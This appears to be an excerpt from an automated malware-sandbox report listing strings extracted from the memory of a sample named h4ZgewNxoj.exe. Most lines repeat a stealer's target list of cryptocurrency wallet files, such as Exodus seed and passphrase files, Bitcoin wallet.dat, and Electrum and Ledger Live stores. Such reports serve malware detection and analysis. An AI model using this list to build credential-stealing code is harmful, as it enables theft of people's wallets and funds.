Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonl=
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local 